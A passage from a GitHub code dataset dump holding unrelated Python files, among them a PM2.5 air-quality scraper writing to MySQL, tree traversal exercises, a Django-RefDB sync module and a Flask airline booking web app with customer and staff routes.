\n\"PBIAS_val_Q\" : PBIAS_Q, \n\"RMSE_val_Q\" : RMSE_Q, \n\"WB_val_Q\" : WB_Q },ignore_index = True) \nprint(perform)\n\n","repo_name":"pravin2408/PIML_daily_predictions_JOH","sub_path":"ML_LSTM_daily_predictions.py","file_name":"ML_LSTM_daily_predictions.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72536005672","text":"import io\n\nimport numpy as np\nfrom scipy.io.wavfile import read\n\nfrom inference_utils import make_spec, make_batch, get_percent2, numpy_mse\n\ncur_threshold = 130\n\n\ndef pipeline(model, input_wav, classifier=None, secs=6):\n\n sr, audio = read(io.BytesIO(input_wav))\n if audio.dtype != 'float32':\n audio = audio.astype(np.float32, order='C') / 32768.0\n if sr == 48000:\n # 0 for left channel, 1 for right\n if audio.ndim == 1:\n audio = audio[:int(sr*secs)]\n else:\n audio = audio[:int(sr*secs), 0]\n else:\n print(f'Invalid sample rate: {sr}. 48000 needed')\n\n spec = make_spec(audio, mel=True)\n mfcc = make_batch(spec)\n\n model_out = model.run(None, {'input_1': mfcc})\n mse_val = numpy_mse(mfcc, model_out[0])\n percent = get_percent2(mse_val, cur_threshold, 5)\n if classifier:\n class_out = np.argmax(classifier.run(None, {'input_1': mfcc}))\n return mse_val, percent, class_out.item()\n return mse_val, percent\n\n","repo_name":"ffs333/anomaly_VAE","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27394778898","text":"import sys\nsys.stdin = open('tree_input.txt')\n\n\ndef preorder(node):\n if node != 0:\n # 전위 순회기 떄문에\n # 내가 할일 먼저 한다.\n # 지금 문제에서 할일은? 나를 출력\n print(node, end=' ')\n # 왼쪽 자식을 조사\n preorder(left[node])\n # 오른쪽 자식을 조사\n preorder(right[node])\n\ndef inorder(node):\n if node != 0:\n # 왼쪽 자식을 조사\n inorder(left[node])\n # 중위 순회\n print(node, end=' ')\n # 오른쪽 자식을 조사\n inorder(right[node])\n\ndef postorder(node):\n if node != 0:\n # 왼쪽 자식을 조사\n postorder(left[node])\n # 오른쪽 자식을 조사\n postorder(right[node])\n # 후위 순회\n print(node, end=' ')\n\nV = int(input()) # 노드의 개수\nE = V -1 # 간선의 개수\nedge = list(map(int, input().split()))\nprint(edge)\n\n# 인덱스를 활용할 것이기 때문에 노드의 개수 +1\n# 0번 노드는 없음\nparent = [0] * (V+1) # 부모의 정보\nleft = [0] * (V+1) # 왼쪽 자식 정보\nright = [0] * (V+1) # 오른쪽 자식 정보\n\ntree = [[0] * 3 for _ in range(V+1)]\n\nfor i in range(E):\n p, c = edge[i*2], edge[i*2+1]\n print(p, c)\n if left[p] == 0: # 아직 왼쪽 자식이 없으면\n left[p] = c # p번의 왼쪽 자식 c\n\n else: #왼쪽에 자식이 있으면\n right[p] = c\n parent[c] = p\n\n if tree[p][0] == 0:\n tree[p][0] = c\n else:\n tree[p][1] = c\n tree[c][2] = p\n # print(left, right, parent)\nprint(tree)\n\nroot = 0\nfor i in range(1, V+1): # 모든노드를 순회\n if parent[i] == 0: # 부모정보를 담았는데, 부모가 없으면 root\n root = i\n break\n# 조사를 시작 root 노드부터\nprint('---전위 순회')\npreorder(root)\nprint()\n\nprint('---중위 순회')\ninorder(root)\nprint()\nprint('---후위 순회')\npostorder(root)\n","repo_name":"PassionSoftIan/algo","sub_path":"PPT/230222_Tree/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12310364576","text":"u\"\"\"This is the synchronisation of the RefDB database with the Django database.\nIt is activated by::\n\n ./manage.py syncdb\n\nand answering \"yes\" to the respective question. The code doesn't change the\nreferences in the RefDB database themselves but it creates needed extended\nnotes (all with the ``\"django-refdb-\"`` prefix in their citation keys).\nAdditionally, it creates RefDB user accounts for all Django user accounts.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport pyrefdb\nimport django.contrib.auth.models\nfrom django.db.models import signals\nfrom . import refdb\nfrom . import models as refdb_app\nfrom . import SharedXNote\n\n\ndef add_extended_note_if_nonexistent(citation_key, database):\n u\"\"\"Adds an extended note with the given citation key if it doesn't exist\n yet. The note will be public (“shared”), but otherwise empty, i.e. no\n title, content etc.\n\n :Paramaters:\n - `citation_key`: the citation key of the extended note\n - `database`: the name of the RefDB database\n\n :type citation_key: str\n :type database: unicode\n \"\"\"\n connection = refdb.get_connection(\"root\", database)\n if not connection.get_extended_notes(\":NCK:=\" + citation_key):\n connection.add_extended_notes(SharedXNote(citation_key))\n\n\ndef ask_user(question, interactive):\n u\"\"\"Asks the user a question and returns whether the user has replied with\n “yes” to it. If ``manage.py`` is not in interactive mode, this function\n always returns ``False``.\n\n :Parameters:\n - `question`: the question to be asked; it should end in a question mark\n - `interactive`: whether the user has requestion interactive mode; it is\n the same parameter as the `sync_extended_notes` parameter of the same\n name\n\n :type question: str\n :type interactive: bool\n\n :Return:\n whether the user has replied with “yes” to the question\n\n :rtype: bool\n \"\"\"\n if interactive:\n confirm = raw_input(\"\\n\" + question + \" (yes/no): \")\n while confirm not in [\"yes\", \"no\"]:\n confirm = raw_input('Please enter either \"yes\" or \"no\": ')\n return confirm == \"yes\"\n else:\n return False\n \n\ndef sync_extended_notes(sender, created_models, interactive, **kwargs):\n u\"\"\"Sychronises the RefDB database with the Django database. See the\n description of this module for further information.\n\n :Parameters:\n - `sender`: the sender of the signal; will always be the module\n ``refdb.models``\n - `created_models`: the model classes from any app which syncdb has\n created so far\n - `interactive`: whether interactive questions are allowed on the command\n line\n\n :type sender: module\n :type created_models: list of ``django.db.models.Model``\n :type interactive: bool\n \"\"\"\n databases = refdb.get_connection(\"root\", None).list_databases()\n if ask_user(\"Do you want to reset user-specific extended notes \"\n \"of a previous Django-RefDB in some or all RefDB databases?\", interactive):\n for database in databases:\n if ask_user(\"Do you want to reset user-specific extended notes \"\n \"of the RefDB database \\\"%s\\\"?\" % database, interactive):\n connection = refdb.get_connection(\"root\", database)\n ids = [note.id for note in connection.get_extended_notes(\n \":NCK:~^django-refdb-users-with-offprint OR :NCK:~^django-refdb-personal-pdfs OR \"\n \":NCK:~^django-refdb-creator\")]\n connection.delete_extended_notes(ids)\n for database in databases:\n for relevance in range(1, 5):\n add_extended_note_if_nonexistent(\"django-refdb-relevance-%d\" % relevance, database)\n add_extended_note_if_nonexistent(\"django-refdb-global-pdfs\", database)\n add_extended_note_if_nonexistent(\"django-refdb-institute-publication\", database)\n\nsignals.post_syncdb.connect(sync_extended_notes, sender=refdb_app)\n","repo_name":"figpope/SparrowSite","sub_path":"django-refdb/refdb/management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3322606429","text":"import random\r\ncount = 0\r\nfor number in range(10):\r\n\r\n player=int(input(\"\"\" мы играем камень-ножницы-бумага выберете: 1.камень 2.ножницы 3.бумага \"\"\")) \r\n if player== 1:\r\n print(\"вы выбрали камень\") \r\n elif player == 2:\r\n print(\"вы выбрали ножницы\") \r\n elif player == 3:\r\n print(\"вы выбрали бумагу\") \r\n else:\r\n print(\"Я вас не понял \")\r\n\r\n comp = random.randint(1,3)\r\n\r\n if comp== 1:\r\n print(\"компьютер выбрал камень\") \r\n elif comp == 2:\r\n print(\"компьютер выбрал ножницы\") \r\n else:\r\n print(\"компьютер выбрал бумагу\")\r\n\r\n if player == comp:\r\n print(\"ничья\")\r\n elif player== 1 and comp== 2 or comp== 3 and player== 2 or player== 3 and comp== 1: \r\n print(\"вы победили\")\r\n count +=1\r\n elif player== 2 and comp== 1 or comp== 2 and player== 3 or player== 1 and comp== 3 : \r\n print(\"вы проиграли\") \r\n else:\r\n print(\"Я вас не понял \")\r\n if count == 3:\r\n print(\"игра окончена\")\r\n break","repo_name":"Elijahbunn/Slava_5","sub_path":"DZ_Slavik_5.py","file_name":"DZ_Slavik_5.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13066144376","text":"#! -*- coding:utf-8 -*-\n\n# 与当日天气的相关性 爬天气数据\nimport datetime\nimport re\nimport time\nfrom requests.exceptions import RequestException\nimport pymysql\nimport requests\nfrom lxml import etree\nfrom selenium import webdriver\n\nmonth = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\"]\n\n\ndef get_one_page(url):\n\n\n\n driver.get(url)\n html = driver.page_source\n return html\n\n\n\n\n# 数据解析有了重复项!\ndef parse_oneDay(html):\n oneDay_contents = []\n\n\n selector = etree.HTML(html)\n\n dtime = selector.xpath('//*[@id=\"content\"]/div[3]/table/tbody/tr/td[1]/text()')\n AQI = selector.xpath('//*[@id=\"content\"]/div[3]/table/tbody/tr/td[3]/text()')\n levels = selector.xpath('//*[@id=\"content\"]/div[3]/table/tbody/tr/td[2]/text()')\n pm25 = selector.xpath('//*[@id=\"content\"]/div[3]/table/tbody/tr/td[5]/text()')\n # 解析很费时间,想法是先把数据结构整理好,然后一次性的清洗\n\n\n for i1,i2,i3,i4 in zip(dtime[1:],AQI[1:],levels[1:],pm25[1:]):\n ha_list = []\n ha_list.append([i1,i2,i3,i4])\n for item in ha_list:\n f4 = []\n for it in item:\n wt = ''.join(it.split())\n f4.append(wt)\n f4_tuple = tuple(f4)\n oneDay_contents.append(f4_tuple)\n\n\n return oneDay_contents\n\n\n\n\n\n\n\n\ndef insertDB(content):\n connection = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='123456', db='PM25',\n charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)\n cursor = connection.cursor()\n # 这里是判断big_list的长度,不是content字符的长度\n try:\n cursor.executemany('insert into YC_OneDay (dtime,AQI,levels,pm25) values (%s,%s,%s,%s)', content)\n connection.commit()\n connection.close()\n print('向MySQL中添加数据成功!')\n except :\n print('出列啦')\n\n\n\n# 网站也不稳定,所以手动拼接来爬吧\n#网络不好,也影响爬虫!\n\nif __name__ == '__main__':\n options = webdriver.ChromeOptions()\n options.add_argument(\"--no-sandbox\")\n driver = webdriver.Chrome(\"/usr/bin/chromedriver\", chrome_options=options)\n for year in [\"2014\", \"2015\", \"2016\", \"2017\", \"2018\", \"2019\"]:\n for m in month:\n full_date = year+ m\n url = 'http://www.tianqihoubao.com/aqi/yinchuan-'+str(full_date)+'.html'\n\n\n html = get_one_page(url)\n\n contet = parse_oneDay(html)\n\n insertDB(contet)\n print(datetime.datetime.now())\n\n\n# dtime,AQI,levels,pm25\n# create table YC_OneDay(\n# id int not null primary key auto_increment,\n# dtime varchar(10),\n# AQI varchar(10),\n# levels varchar(10),\n# pm25 varchar(10)\n# ) engine=InnoDB charset=utf8;\n\n\n# drop table YC_OneDay;\n# 修改字段类型\n#alter table YC_OneDay modify column pm25 int ;\n\n\n# 查询PM25最严重前30\n\n# select dtime,AQI,levels,pm25 from YC_OneDay order by pm25 desc limit 30;\n\n\n\n\n","repo_name":"mojoru2023/PM2.5_Spiders","sub_path":"yinchuan/YC_Pm25_OneDays.py","file_name":"YC_Pm25_OneDays.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11337883941","text":"\nfrom setuptools import setup\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='helloworld',\n version='0.0.1',\n description='Say hello!',\n py_modules=[\"helloworld\"],\n package_dir={'': 'src'},\n classifiers=[\n \"Programming Langauge :: Python :: 3\",\n \"Programming Langauge :: Python :: 3.6\",\n \"Programming Langauge :: Python :: 3.7\",\n \"License :: OSI Approved :: MIT \",\n \"Operationing System :: OS Independent\",\n ],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n install_requires = [\n \n ],\n extras_require = {\n \"dev\": [\n \"pytest>=3.7\",\n \"check-manifest\",\n ],\n },\n entry_points = {\n \"console_scripts\" :[\n \"helloworld = helloworld:say_hello\",\n ]\n },\n url=\"https://github.com/steve1281/helloworld_package\",\n author=\"Steven V Falcigno\",\n author_email=\"steve1281@hotmail.com\",\n)\n\n","repo_name":"steve1281/helloworld_package","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23646081154","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: Li Yuanming\nEmail: yuanmingleee@gmail.com\nDate: May 23, 2022\n\"\"\"\nfrom typing import Generic, TypeVar\n\nfrom pydantic import validator\nfrom pydantic.generics import GenericModel\n\nRequiredType = TypeVar('RequiredType')\n\n\nclass TypeCheckMixin(GenericModel, Generic[RequiredType]):\n \"\"\"For auto detecting configuration class by set value of :code:`type`.\n \"\"\"\n type: RequiredType\n\n __required_type__: RequiredType\n\n @validator('type')\n def check_type(cls, required_type: RequiredType) -> RequiredType:\n \"\"\"\n Checks type value provided is the same as the required value.\n This is to generate validator for check :code:`type` field of subclasses of Generic typpe :class:`RequiredType`.\n \"\"\"\n if required_type != cls.__required_type__:\n raise ValueError(f'Expected {cls.__required_type__} but got {required_type}')\n return required_type\n","repo_name":"MLSysOps/Active-Learning-as-a-Service","sub_path":"alaas/types/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"72"} +{"seq_id":"24658903818","text":"def find(x):\n pos = [z for z in data if z not in prev and sum([abs(x[i] - z[i]) for i in range(4)]) <= 3]\n for y in pos:\n prev.add(y)\n find(y)\n\nwith open(\"2018day25.txt\", 'r') as file:\n data = [tuple([int(y) for y in x.split(',')]) for x in file.read().splitlines()]\n c = 0\n prev = set()\n while len(prev) != len(data):\n x = next(iter([x for x in data if x not in prev]))\n prev.add(x)\n find(x)\n c += 1\n print(c)\n","repo_name":"Diderikdm/Advent-of-Code-2018","sub_path":"day 25 - part 1 & 2.py","file_name":"day 25 - part 1 & 2.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33482235628","text":"from flask import Flask, render_template, request, session, url_for, redirect\nfrom flask_mysqldb import MySQL\nimport os\nimport sys\nimport math\nimport yaml # pip install pyyaml\nsys.path.insert(0, os.getcwd())\nfrom utils.general import *\nfrom utils.customer import *\nfrom utils.staff import *\nfrom utils.public_info import *\nfrom utils.register import *\nfrom utils.login import *\n\nglobal customer_tokens\nglobal staff_tokens\n\ncustomer_tokens = {}\nstaff_tokens = {}\n\napp = Flask(__name__)\napp.static_folder = 'static'\n\n# Configure db\ndb = yaml.safe_load(open('db_info.yaml'))\napp.config['MYSQL_USER'] = db['mysql_user']\napp.config['MYSQL_PASSWORD'] = db['mysql_password']\napp.config['MYSQL_DB'] = db['mysql_db']\napp.config['MYSQL_PORT'] = db['mysql_port']\n\nmysql = MySQL(app)\n\nwith app.app_context():\n curs = mysql.connection.cursor()\n\n\n# Define a route to hello function\n@app.route('/')\ndef hello():\n return render_template('index.html')\n\n\n\n### STAFF LOG IN ###\n\n@app.route(\"/staff\")\ndef staff():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n return render_template('staff.html', is_staff = True, username=session[\"username\"])\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/login_staff')\ndef login_staff():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n\n if s_logged:\n return redirect(url_for(\"staff\"))\n\n return render_template('login_staff.html')\n\n@app.route('/loginAuthStaff', methods=['POST', 'GET'])\ndef loginAuthStaff():\n try:\n username = request.form['username']\n employer = request.form['employer']\n password = request.form['password']\n except:\n return redirect(url_for(\"login_staff\"))\n\n # Parse input for security\n if not parse_input([username]):\n return redirect(url_for(\"login_staff\"))\n\n if not parse_input([employer]):\n return redirect(url_for(\"login_staff\"))\n\n if not parse_input([password], True):\n return redirect(url_for(\"login_staff\"))\n\n is_staff = query_staff_credentials(username, password, employer, mysql)\n\n if is_staff:\n session['username'] = username\n session['key'] = encrypt_password(username + password)\n session['employer'] = employer\n staff_tokens[username] = session[\"key\"]\n return redirect(url_for(\"staff\"))\n\n error = 'Log in credentials are incorrect'\n return render_template('login_staff.html', error=error)\n\n\n\n### CUSTOMER LOG IN ###\n# Define route for login\n@app.route('/login_customer')\ndef login_customer():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n\n if c_logged:\n return redirect(url_for(\"customer\"))\n\n return render_template('login_customer.html')\n\n@app.route(\"/customer\")\ndef customer():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n return render_template('customer.html', is_customer=True, username=session[\"username\"])\n return redirect(url_for(\"login_customer\"))\n\n@app.route('/loginAuthCust', methods=['POST', 'GET'])\ndef loginAuthCust():\n try:\n email = request.form['username']\n password = request.form['password']\n except:\n return redirect(url_for(\"login_customer\"))\n\n # Parse input for security\n if not parse_input([email]):\n return redirect(url_for(\"login_customer\"))\n\n\n if not parse_input([password], True):\n return redirect(url_for(\"login_customer\"))\n\n is_customer = query_customer_credentials(email, password, mysql)\n if is_customer:\n session['username'] = email\n session['key'] = encrypt_password(email + password)\n customer_tokens[email] = session[\"key\"]\n return redirect(url_for(\"customer\"))\n\n error = 'Log in credentials are incorrect'\n return render_template('login_customer.html', error=error)\n\n@app.route('/logout')\ndef logout():\n session[\"username\"] = \"\"\n session[\"key\"] = \"\"\n session[\"employer\"] = \"\"\n return redirect('/')\n\n@app.route('/homepage_redirect')\ndef homepage_redirect():\n c_logged, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n return redirect(url_for('staff'))\n if c_logged:\n return redirect(url_for('customer'))\n return redirect('/')\n\n### STAFF REGISTER ###\n\n# Define route for staff register\n@app.route('/register_staff')\ndef register_staff():\n return render_template('register staff.html')\n\n# Authenticates the register\n@app.route('/registerAuthStaff', methods=['GET', 'POST'])\ndef registerAuthStaff():\n username = \"\"\n password = \"\"\n fname = \"\"\n lname = \"\"\n dob = \"\"\n employer = \"\"\n\n # Check all input is there\n try:\n username = request.form['username']\n password = request.form['password']\n fname = request.form['fname']\n lname = request.form['lname']\n dob = request.form['dob']\n employer = request.form['employer']\n\n except:\n error = \"Input Missing\"\n return render_template('register staff.html', error=error)\n\n # Parse input for security\n if not parse_input([password], True):\n error = \"Username or Password Error. Password may not contain space or '\\Z', '\\\\', '\\%', '\\_', \\\n '?', '-', '(', ')', '{', '}', '[', ']', and must be 8 characters or more\"\n return render_template('register staff.html', error=error)\n\n if not parse_input([username, fname, lname, dob, employer]):\n error = \"Input Error\"\n return render_template('register staff.html', error=error)\n\n if not check_date_format(dob):\n error = 'Date of Birth must be formate YYYY-MM-DD'\n return render_template('register staff.html', error=error)\n\n # check if username exists\n if query_staff_username(username, mysql):\n error = f'Account with username {username} already exists'\n return render_template('register staff.html', error=error)\n\n # check if employer does not exist\n if not query_staff_employer(employer, mysql):\n error = f'Airline {employer} does not exist'\n return render_template('register staff.html', error=error)\n\n # create account\n create_staff_account(username, password, fname,\n lname, dob, employer, mysql)\n # render homepage\n return redirect('/')\n\n\n\n### CUSTOMER REGISTER ###\n\n# Define route for customer register\n@app.route('/register_customer')\ndef register_customer():\n return render_template('register customer.html')\n\n# Authenticates the register\n@app.route('/registerAuthCustomer', methods=['GET', 'POST'])\ndef registerAuthCustomer():\n email = \"\"\n name = \"\"\n password = \"\"\n building_num = \"\"\n city = \"\"\n state = \"\"\n street = \"\"\n pp_country = \"\"\n pp_num = \"\"\n pp_expr = \"\"\n dob = \"\"\n phone_num = \"\"\n\n # Make sure all input is there\n try:\n email = request.form['email']\n name = request.form['name']\n password = request.form['password']\n building_num = request.form['building_num']\n city = request.form['city']\n state = request.form['state']\n street = request.form['street']\n pp_country = request.form['pp_country']\n pp_num = request.form['pp_num']\n pp_expr = request.form['pp_expr']\n dob = request.form['dob']\n phone_num = request.form['phone_num']\n except:\n error = \"Input Missing\"\n return render_template('register customer.html', error=error)\n\n # Parse input for security\n if not parse_input([password], True):\n error = \"Username or Password Error. Password may not contain space or '\\Z', '\\\\', '\\%', '\\_', \\\n '?', '-', '(', ')', '{', '}', '[', ']', and must be 8 characters or more\"\n return render_template('register customer.html', error=error)\n\n if not parse_input([email, name, building_num, city, state, street, pp_country, pp_num, pp_expr, dob, phone_num]):\n error = \"Input Error\"\n return render_template('register customer.html', error=error)\n\n if not check_date_format(dob):\n error = 'Date of Birth must be formate YYYY-MM-DD'\n return render_template('register customer.html', error=error)\n\n # check if email exists\n if query_customer_email(email, mysql):\n error = f'Account with email {email} already exists'\n return render_template('register customer.html', error=error)\n\n # create account\n create_customer_account(email,name,password,building_num,city,state,\n street,pp_country,pp_num,pp_expr,dob,phone_num, mysql)\n\n # render homepage\n return redirect('/')\n\n\n\n### PUBLIC FLIGHT INFO ###\n@app.route('/public_info')\ndef public_info():\n #headings,data=public_view_oneway_flights(mysql)\n return render_template('public_info.html')\n\n@app.route(\"/public_view_flights\", methods=['GET', 'POST'])\ndef public_view_flight():\n c_org = None\n c_dest = None\n a_org = None\n a_dest = None\n dept_dt = None\n return_dt = None\n f_type = None\n headings = []\n data = []\n\n try:\n f_type = request.form['flight_type']\n c_org = request.form['city_origin']\n c_dest = request.form['city_dest']\n a_org = request.form['airport_origin']\n a_dest = request.form['airport_dest']\n dept_dt = request.form['dept_dt']\n return_dt = request.form['return_dt']\n except:\n pass\n\n if not parse_input([c_org,c_dest,a_org,a_dest,dept_dt,return_dt,f_type]):\n return render_template('public_info.html', headings=headings, data=data)\n\n if not check_datetime_format(dept_dt) and check_datetime_format(return_dt):\n error = 'Datetime must be formate YYYY-MM-DD HH:MM:SS'\n return render_template('public_info.html', error=error)\n\n if f_type=='two way':\n headings, data = public_view_twoway_flights(mysql,CITY_ORIGIN=c_org,CITY_DEST=c_dest,AP_ORIGIN=a_org,\n AP_DEST=a_dest,START_DATE=dept_dt,END_DATE=return_dt)\n return render_template('public_info.html', headings=headings, data=data)\n elif f_type=='one way':\n headings, data = public_view_oneway_flights(mysql,CITY_ORIGIN=c_org,CITY_DEST=c_dest,AP_ORIGIN=a_org,\n AP_DEST=a_dest,START_DATE=dept_dt,END_DATE=return_dt)\n return render_template('public_info.html', headings=headings, data=data)\n else:\n error=\"Flight Type must be 'one way' or 'two way'\"\n render_template('public_info.html', error=error)\n\n@app.route('/public_status')\ndef public_status():\n return render_template('public_status.html')\n\n@app.route(\"/public_check_status\", methods=['GET', 'POST'])\ndef public_check_status():\n fnum = None\n airline = None\n dept_dt = None\n\n try:\n fnum=request.form['flight_num']\n airline=request.form['airline']\n dept_dt=request.form['dept_dt']\n except:\n error='Bad inputs'\n return render_template('public_status.html', error=error)\n\n if not parse_input([fnum,airline,dept_dt]):\n error = 'Bad inputs'\n return render_template('public_status.html', error=error)\n\n if not check_datetime_format(dept_dt):\n error = 'Datetime must be formate YYYY-MM-DD HH:MM:SS'\n return render_template('public_status.html', error=error)\n\n headings, data = public_view_flight_status(mysql, fnum, airline, dept_dt)\n return render_template('public_status.html', headings=headings, data=data)\n\n\n\n### STAFF USE CASES ###\n@app.route(\"/staff_view_flights\", methods=['GET', 'POST'])\ndef staff_view_flights():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n\n # Before and after are none because they will be set to the wrong value in the sql function otherwise\n before = None\n after = None\n source = \"\"\n destination = \"\"\n s_city = \"\"\n d_city = \"\"\n flights = []\n\n try:\n before = request.form['before']\n after = request.form['after']\n source = request.form['source']\n destination = request.form['destination']\n s_city = request.form['s_city']\n d_city = request.form['d_city']\n\n # Allow some inputs to be missing\n except:\n pass\n\n # Input security\n if not parse_input([before, after, source, destination, s_city, d_city]):\n return render_template('staff_view_flights.html', flights=flights)\n\n if not check_datetime_format(before) and check_datetime_format(after):\n error = 'Datetime must be formate YYYY-MM-DD HH:MM:SS'\n return render_template('staff_view_flights.html', error=error)\n\n airline = session['employer']\n headings, flights = staff_view_flight_all(airline, before, after, source, destination, s_city, d_city, mysql)\n\n return render_template('staff_view_flights.html', flights=flights, headings=headings)\n\n return redirect('/')\n\n\n@app.route(\"/staff_view_flights_customer///\")\ndef staff_view_flights_customer(flight_number, airline, dept_dt):\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n # dept_dt = \"\".join(dept_dt.split(\" \")[0].split(\"-\"))\n\n headings, data = staff_view_flight_passengers(flight_number, airline, dept_dt, mysql)\n\n if len(data) > 0:\n result = True\n else:\n result = False\n\n return render_template('staff_view_flights_customers.html', headings=headings, customers=data, flight_number=flight_number, result=result)\n\n return redirect(url_for(\"staff_login\"))\n\n@app.route(\"/staff_create_flight\")\ndef staff_create_flight_view():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n\n airline = session['employer']\n planes = planes_of_airline(airline,mysql)\n\n return render_template(\"staff_create_flight.html\", airline=airline, planes=planes)\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_create_flight_submit', methods=[\"POST\", \"GET\"])\ndef staff_create_flight_submit():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n flight_num = \"\"\n dept_time = \"\"\n arr_time = \"\"\n source = \"\"\n destination = \"\"\n base_price = \"\"\n airplane_id = \"\"\n status = \"\"\n\n airline = session['employer']\n\n try:\n flight_num = request.form['flight_num']\n dept_time = request.form['dept_time']\n arr_time = request.form['arr_time']\n source = request.form['source']\n destination = request.form['destination']\n base_price = request.form['base_price']\n airplane_id = request.form['airplane_id']\n status = request.form['status']\n except:\n return redirect(url_for('staff_create_flight_view'))\n\n if not parse_input([flight_num, dept_time, arr_time, source, destination, base_price, airplane_id, status]):\n return redirect(url_for('staff_create_flight_view'))\n\n if not check_datetime_format(dept_time) and check_datetime_format(arr_time):\n return redirect(url_for('staff_create_flight_view'))\n\n if not check_datetime_format(dept_time) and check_datetime_format(arr_time):\n return redirect(url_for('staff_create_flight_view'))\n\n staff_create_flight(flight_num, airline, airplane_id, arr_time, dept_time, base_price, source, destination, status, mysql)\n\n return render_template(\"success.html\", title='Airline Staff Add Flight', \\\n message=f'Flight {flight_num} ({airplane_id}) departing at {dept_time} from {source} and arriving at {arr_time} in {destination} with price {base_price} and status {status}',\\\n next='/staff')\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_change_flight_status')\ndef staff_change_flights():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n\n if s_logged:\n return render_template(\"staff_change_flight_status.html\")\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_change_flight_status_submit', methods=['GET', 'POST'])\ndef staff_change_flights_submit():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n flight_num = \"\"\n dept_time = None\n status = \"\"\n\n airline = session[\"employer\"]\n\n try:\n flight_num = request.form['flight_num']\n dept_time = request.form['dept_time']\n status = request.form['status']\n\n except:\n return redirect(url_for(\"staff_change_flights\"))\n\n if not parse_input([flight_num, dept_time, status]):\n return redirect(url_for(\"staff_change_flights\"))\n\n if not check_datetime_format(dept_time):\n return redirect(url_for(\"staff_change_flights\"))\n\n staff_update_flight_status(flight_num, airline, dept_time, status, mysql)\n\n return render_template(\"success.html\", title='Airline Staff Change Flight', \\\n message=f'Flight {flight_num} changed', next='/staff')\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_add_new_airplane')\ndef staff_add_new_airplane():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n return render_template(\"staff_add_new_airplane.html\")\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_add_new_airplane_submit', methods=['GET', 'POST'])\ndef staff_add_new_airplane_submit():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n airplane_id = \"\"\n num_seats = \"\"\n age = None\n manufacturer = \"\"\n airline = session['employer']\n\n try:\n airplane_id = request.form['airplane_id']\n num_seats = request.form['num_seats']\n age = request.form['age']\n manufacturer = request.form['manufacturer']\n except:\n return redirect(url_for(\"staff_add_new_airplane\"))\n\n if not parse_input([airplane_id, num_seats, age]):\n return redirect(url_for(\"staff_add_new_airplane\"))\n\n if not check_date_format(age):\n redirect(url_for(\"staff_add_new_airplane\"))\n\n staff_create_airplane(airplane_id, airline, num_seats, age, manufacturer, mysql)\n\n return render_template('success.html', title=\"Airline Staff Add Airplane\", \\\n message=f\" Plane with ID: {airplane_id} has been added to {airline}\",\\\n next='/staff')\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_add_new_airport')\ndef staff_add_new_airport():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n return render_template(\"staff_add_new_airport.html\")\n\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_add_new_airport_submit', methods=['GET', 'POST'])\ndef staff_add_new_airport_submit():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n name = \"\"\n city = \"\"\n country = \"\"\n airport_type = \"\"\n\n try:\n name = request.form['name']\n city = request.form['city']\n country = request.form['country']\n airport_type = request.form['airport_type']\n except:\n return redirect(url_for(\"staff_add_new_airport\"))\n \n if not parse_input([name, city, country, airport_type]):\n return redirect(url_for(\"staff_add_new_airport\"))\n \n staff_create_airport(name, city, country, airport_type, mysql)\n\n return render_template('success.html', 